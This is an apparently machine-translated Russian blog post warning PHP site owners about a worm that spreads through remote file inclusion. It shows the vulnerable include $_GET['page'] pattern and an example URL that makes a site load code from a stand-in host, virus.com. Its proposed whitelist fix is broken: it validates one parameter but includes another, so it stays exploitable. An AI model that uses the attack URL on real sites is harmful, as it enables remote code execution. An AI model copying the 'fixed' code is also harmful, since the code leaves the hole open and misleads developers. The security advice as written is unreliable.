У Symantec есть отчет о вирусе здесь .
Я еще не видел ни одного новостного сайта PHP, который мог бы его использовать, но, используя учетную запись виртуального хоста, удалось преднамеренно раскрыть для него некоторые PHP-скрипты.
После изучения зараженных сценариев, что вызывает беспокойство, однажды зараженный, каждый раз, когда сценарий выполняется, вирус отправляется на охоту за другими веб-сайтами, использующими PHP, чтобы выяснить, может ли он обмануть их в выполнении вируса, тем самым распространяя его дальше непосредственно по Интернет. Хотя распространение может быть медленным, оно может происходить автоматически, без вашего вмешательства!
Если ваш сайт содержит код, подобный;
// index.php include $_GET['page'];
Вам нужно принять меры сейчас — ваш сайт может быть заражен URL-адресом, как;
http://yoursite.com/index.php?page=http://virus.com/virus.php
http://yoursite.com/index.php?page=http://virus.com/virus.php
Простой способ проверить это;
$pages = array('news','articles','blog'); if ( in_array($_GET['page'], $pages) ) { include $_GET['php'] . '.php'; } else { include 'home.php'; }
В ответ Sitepoint принял экстремальный, но необходимый подход к обновлению до .NET .